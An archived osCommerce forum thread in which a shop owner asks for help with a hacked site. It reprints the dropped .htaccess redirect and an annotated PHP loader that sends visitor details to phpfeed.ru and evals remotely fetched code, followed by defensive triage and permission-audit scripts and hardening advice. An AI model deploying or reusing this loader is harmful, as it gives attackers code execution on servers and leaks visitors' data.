
osCommerce


Site hacked?!? Please help


dubz99


Today I discovered that our shipping/payment modules were not working properly. After going into admin, I discovered that no shipping or payment methods were installed!

 

Finally I found two files in /catalog/includes/modules/shipping/. The first was a .htaccess redirect with the code below.

 

Options -MultiViews
ErrorDocument 404 //catalog/includes/modules/shipping/70884.php

 

and the second, the file mentioned above, had the following code.

 

Can some of you PHP gurus pick apart the code below and tell me what the file was doing?? Many thanks and much appreciated!!!

 

<? error_reporting(0); // silence all PHP errors so nothing shows up in logs or on screen
// Collect request and host details, falling back to the old register_globals names.
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
// Pack all of the above, base64-encoded, into a query string that is sent to the remote host.
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
// Default remote host: "cGhwZmVlZC5ydQ==" decodes to phpfeed.ru.
$f=base64_decode("cGhwZmVlZC5ydQ==");
// If the script is requested directly and the q parameter hashes to a hard-coded MD5, the host is taken from the id parameter instead.
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="2b4745515d3e75fee07f3ef64d4f2968") $f=$_REQUEST["id"];
// Fetch and execute whatever the remote host returns, trying three methods in turn:
// remote include from http://ads.<host>, then file_get_contents from http://7.<host> plus eval(),
// then curl from http://71.<host> plus eval(). The visitor's data in $z is sent each time.
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>

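The posted file can be read statically without ever running it. The Python script below is an added example, not part of the original post and not osCommerce code: it pulls every base64_decode("...") literal out of the source, decodes it, counts the calls that together make the file a remote code loader (eval, file_get_contents, curl_init, include of a decoded string, error_reporting(0)), and joins the decoded URL prefixes to the decoded default host so the fetch locations can be blocked at the firewall and searched for in web-server and DNS logs. The embedded sample is a trimmed copy of the posted code; the regexes, function names and the "verdict" label are my own.

```python
"""Static triage of an obfuscated PHP loader like the posted 70884.php (added example)."""
import base64
import re

# Constructed sample: the base64 literals and call pattern of the posted file,
# trimmed to the parts this triage inspects.
SAMPLE_PHP = r'''<? error_reporting(0);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($h);
$f=base64_decode("cGhwZmVlZC5ydQ==");
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);$o=curl_exec($cu);eval($o);}; ?>'''

B64_LITERAL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')

# Calls that, seen together, mark a script that fetches and executes remote code.
INDICATOR_PATTERNS = {
    "error_reporting(0)": re.compile(r'error_reporting\(\s*0\s*\)'),
    "eval": re.compile(r'\beval\('),
    "include of decoded string": re.compile(r'\binclude\(\s*base64_decode'),
    "file_get_contents": re.compile(r'\bfile_get_contents\('),
    "curl_init": re.compile(r'\bcurl_init\('),
    "base64_encode of a variable": re.compile(r'base64_encode\(\$'),
}


def decode_literals(src):
    """Return (encoded, decoded) pairs for every base64_decode("...") literal, in source order."""
    pairs = []
    for enc in B64_LITERAL.findall(src):
        try:
            dec = base64.b64decode(enc, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            dec = None  # not printable text; leave for manual review
        pairs.append((enc, dec))
    return pairs


def count_indicators(src):
    """Count occurrences of each indicator pattern."""
    return {name: len(rx.findall(src)) for name, rx in INDICATOR_PATTERNS.items()}


def reconstruct_fetch_urls(src):
    """Join each decoded URL prefix to the decoded default host.

    Assumes the posted script's layout: the first literal is the host assigned
    to $f, the following ones are "http://<subdomain>." prefixes concatenated with $f.
    """
    decoded = [d for _, d in decode_literals(src) if d is not None]
    if len(decoded) < 2:
        return []
    host, prefixes = decoded[0], decoded[1:]
    return [prefix + host for prefix in prefixes]


def triage(src):
    """Summarise the script; the verdict is a coarse label for the analyst, not a signature."""
    counts = count_indicators(src)
    remote_fetch = (counts["file_get_contents"] or counts["curl_init"]
                    or counts["include of decoded string"])
    verdict = "remote code loader" if counts["eval"] and remote_fetch else "needs manual review"
    return {
        "decoded": decode_literals(src),
        "indicators": counts,
        "fetch_urls": reconstruct_fetch_urls(src),
        "verdict": verdict,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PHP), indent=2))
```

Run it against the real file with `triage(open("70884.php").read())`; the decoded host and the three fetch URLs are what to search for in access logs (the long base64 query string in $z is the tell-tale request shape) and to block on outbound traffic while the server is cleaned.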

This probably happened because you have folders with 777 permissions.

 

Check all your folders (even in the Admin) for bogus PHP files.

 

The names are probably all numbers like the example you posted:

 

70884.php

 

But there could be others.

 

If it's the same one that got me, and it looks that way, it's a "pay per click" scam.

 

They hack your site with these bogus files then seed search engines to go there, and just sit back and collect for every click.

 

Check your file/folder permissions.

 

FILE permissions shouldn't be higher than 644

 

FOLDER permissions shouldn't be higher than 755

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


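Jim's checklist (bogus all-numeric .php files, .htaccess redirects, files above 644, folders above 755) and dubz's 744 mistake further down the thread can be turned into one audit. The Python script below is an added example, not from the thread or from osCommerce; it walks a web root and reports every finding. build_demo_tree() constructs a throwaway directory with placeholder names reproducing the layout in the thread so the audit can be tried offline. It assumes the web server runs as a user other than the file owner, so a directory without the execute (search) bit for others produces a 403, which is the symptom dubz hit with 744.

```python
"""Audit a web root for the symptoms described in this thread (added example)."""
import os
import re
import stat
import sys
import tempfile

MAX_FILE_MODE = 0o644   # Jim's limit for files: rw-r--r--
MAX_DIR_MODE = 0o755    # Jim's limit for folders: rwxr-xr-x
NUMERIC_PHP = re.compile(r'^\d+\.php$')
# ErrorDocument <code> <target ending in .php>, the pattern in the posted .htaccess
HTACCESS_REDIRECT = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+\S+\.php\b', re.M)


def audit(root):
    """Walk root and return a list of (path, finding) tuples; an empty list is clean."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            mode = stat.S_IMODE(os.lstat(p).st_mode)
            if mode & ~MAX_DIR_MODE:
                findings.append((p, "dir mode %o exceeds 755" % mode))
            # Assumption: the web server runs as a different user than the file
            # owner, so without x for others it cannot enter the directory (403).
            if not mode & stat.S_IXOTH:
                findings.append((p, "dir mode %o has no x for others (web server gets 403)" % mode))
        for f in filenames:
            p = os.path.join(dirpath, f)
            st = os.lstat(p)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlinks are judged by their targets elsewhere in the walk
            mode = stat.S_IMODE(st.st_mode)
            if mode & ~MAX_FILE_MODE:
                findings.append((p, "file mode %o exceeds 644" % mode))
            if NUMERIC_PHP.match(f):
                findings.append((p, "PHP file with an all-numeric name"))
            if f == ".htaccess":
                with open(p, encoding="utf-8", errors="replace") as fh:
                    if HTACCESS_REDIRECT.search(fh.read()):
                        findings.append((p, ".htaccess ErrorDocument points at a .php file"))
    return findings


def build_demo_tree():
    """Constructed sample tree (placeholder names) reproducing the thread's layout."""
    root = tempfile.mkdtemp(prefix="oscaudit_")
    shipping = os.path.join(root, "catalog", "includes", "modules", "shipping")
    admin = os.path.join(root, "admin")
    os.makedirs(shipping)
    os.makedirs(admin)
    files = {
        os.path.join(shipping, "70884.php"): "<? /* placeholder for the dropped file */ ?>\n",
        os.path.join(shipping, ".htaccess"):
            "Options -MultiViews\nErrorDocument 404 //catalog/includes/modules/shipping/70884.php\n",
        os.path.join(shipping, "flat.php"): "<?php /* legitimate shipping module */ ?>\n",
    }
    for path, body in files.items():
        with open(path, "w") as fh:
            fh.write(body)
    # Normalise everything first so the host's umask does not affect the result.
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), 0o755)
        for f in filenames:
            os.chmod(os.path.join(dirpath, f), 0o644)
    os.chmod(shipping, 0o777)  # the world-writable folder Jim suspects
    os.chmod(admin, 0o744)     # the mistake that produced 403s in the thread
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for path, finding in audit(target):
        print("%s: %s" % (finding, path))
```

Run it as `python audit.py /path/to/catalog` on the real store. For a one-off check straight from the shell, GNU find gives the same first two answers: `find catalog -type d -perm -o+w` lists world-writable folders and `find catalog -type f -regex '.*/[0-9]+\.php'` lists all-numeric PHP files.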

Jim,

 

I did find similar files in different areas and have deleted them

 

I have changed permissions as stated in your last post, but now I am getting a 403 forbidden error on admin and front end - every page.

 

Any help would be appreciated!

 

Thanks Again

dubz


My bad, it seems I made the folders 744 rather than 755.

 

All is good now, so how do you think these files were put here? What are the possibilities? I would like to make sure this doesn't happen again and I would appreciate your wealth of knowledge.

 

dubz


It's a web-bot.

 

Looking at the timestamps on files I've seen it has to be.

 

No one could upload files that fast manually.



Well that makes me feel a little better about it-

 

As always thanks for your help!

 

dubz



This probably happened because you have folders with 777 permissions.

No way, this happens only because the server was set up incorrectly with security holes - that is my opinion as a Linux system administrator.

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.


this happens only because the server was set up incorrectly with security holes

That may be true, but after changing folder permissions to 755 it doesn't happen.



That may be true, but after changing folder permissions to 755 it doesn't happen.

 

Had a lot of problems with hackers a few months ago, so I changed the name of the admin directory to XXXXX. You have to adjust the admin/include/configure.php file to suit the new name. That solved my problem.

John

To improve is to change; to be perfect is to change often.

 


Archived

This topic is now archived and is closed to further replies.
